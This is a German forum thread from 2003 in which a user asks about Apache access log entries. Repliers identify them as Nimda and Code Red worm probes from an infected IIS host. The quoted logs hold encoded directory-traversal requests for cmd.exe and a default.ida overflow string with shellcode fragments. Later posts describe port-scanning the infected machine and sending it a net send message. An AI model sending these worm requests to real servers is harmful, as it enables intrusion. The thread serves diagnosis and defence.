12.05.2024, 16:22
Change Language
Register
Login
You are not logged in.
Dear visitor, welcome to Aqua Computer Forum. If this is your first visit here, please read the Help. It explains how this page works. You must be registered before you can use all the page's features. Please use the registration form, to register here or read more information about the registration process. If you are already registered, please login here.
Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 5:22pm
Ich hab mir grad ma die Access.log von meinem Apache angeguckt und bin dabei auf folgendes gestoßen:
Ist das normal?
Ich denk ja eigentlich net dass irgendein Apache Zugriff was in meinem Windoof Ordner zu suchen hat >
!
Quoted
80.142.180.167 - - [11/Apr/2003:22:49:28 +0200] "GET http://www.yahoo.com/ HTTP/1.1" 200 58
217.64.100.90 - - [11/Apr/2003:23:19:19 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
217.64.100.90 - - [11/Apr/2003:23:19:22 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286
217.64.100.90 - - [11/Apr/2003:23:19:27 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
217.64.100.90 - - [11/Apr/2003:23:19:30 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
217.64.100.90 - - [11/Apr/2003:23:19:32 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.64.100.90 - - [11/Apr/2003:23:19:36 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
217.64.100.90 - - [11/Apr/2003:23:19:39 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
217.64.100.90 - - [11/Apr/2003:23:19:42 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 343
217.64.100.90 - - [11/Apr/2003:23:19:46 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:49 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:19:54 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.64.100.90 - - [11/Apr/2003:23:20:02 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
217.64.100.90 - - [11/Apr/2003:23:20:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 293
217.64.100.90 - - [11/Apr/2003:23:20:15 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.64.100.90 - - [11/Apr/2003:23:20:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
217.220.112.3 - - [11/Apr/2003:23:26:24 +0200] "GET
Ist das normal?
Ich denk ja eigentlich net dass irgendein Apache Zugriff was in meinem Windoof Ordner zu suchen hat >
! 
Re: Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 5:46pm
das sind ganz normale web-zugriffe über die jemand versucht zugriff auf deinen win-ordner zu bekommen, wenn du den apache hast kann dir das aber egal sein, der gibt da nur error 404 zurück.. 
edit: falsch formuliert, der versucht net direkt zugriff zu bekommen sondern befehle auf deinem rechner auszuführen... funktioniert aber nur beim microsoft iis und einigen billig-webservern, aber net beim apache
edit: falsch formuliert, der versucht net direkt zugriff zu bekommen sondern befehle auf deinem rechner auszuführen... funktioniert aber nur beim microsoft iis und einigen billig-webservern, aber net beim apache
Re: Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 6:06pm
Ich hab mir grad ma die Access.log von meinem Apache angeguckt und bin dabei auf folgendes gestoßen:
Ist das normal?
Ich denk ja eigentlich net dass irgendein Apache Zugriff was in meinem Windoof Ordner zu suchen hat >
IMHO ist das ein mit dem NIMDA Virus infizierter IIS Server,
der jetzt versucht Dein sys zu infizieren. Mich wundert das
es noch Systeme gibt, die gegen diesen Virus noch nicht
geschützt sind.
MfG
Mburg
Re: Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 6:11pm
Hehe, ich hab den ma angepingt, der hat ja net ma DSL (1000ms durchschnitt).
Der heißt Cyber15, nur leider brauch ich Username+PW um auf ihn zugreifen zu können.
Und jetzt die DAU Frage
:
"Wie hack isch den denn??"
Hab auch noch mehr von den fiesen Angriffen (immer 404
):
Der heißt Cyber15, nur leider brauch ich Username+PW um auf ihn zugreifen zu können
.Und jetzt die DAU Frage
:"Wie hack isch den denn??"
Hab auch noch mehr von den fiesen Angriffen (immer 404
):
217.227.243.211 - - [12/Apr/2003:14:32:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 283
Re: Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 6:25pm
Hehe, ich hab den ma angepingt, der hat ja net ma DSL (1000ms durchschnitt).
Der heißt Cyber15, nur leider brauch ich Username+PW um auf ihn zugreifen zu können
Und jetzt die DAU Frage
"Wie hack isch den denn??"
Hab auch noch mehr von den fiesen Angriffen (immer 404
Portscan mit nmap und kucken ob NetBEUI/BIOS ports offen
sind (139). Dann mit net send 'message' ne Nachricht auf
cyber15 schicken. Sag dem ärmsten das er Nimda infiziert ist
und das er Deine Logs vollmüllt. Hacken ist Verboten.
Nen plötzlich auftauchendes PopUp aus dem Nirwana ist
Schreck genug.
MfG
Mburg
Re: Doh! (Oder: Apache, was soll das?)
Saturday, April 12th 2003, 9:02pm
hmm, obwohl port 139 offen ist, gehts irgendwie net :.
Ich hab nur bis 500 gescannt .. was kann man denn mit 445 und 135 so anstellen? ;D
Ich hab grad folgendes gesendet:
net send 217.64.100.90 Your Sys is infected with the NIMDA virus
"Die Nachricht wurde Erfolgreich an 217.64.100.90 versendet"
war die Rückmeldung. Das war NetBIOS/BEUI über Port 139.
Das bedeutet das die Kiste (laut whois irgentwo in Mali ;D )
jetzt ein PopUp Fenster mit der Nachricht auf hat.
MfG
Mburg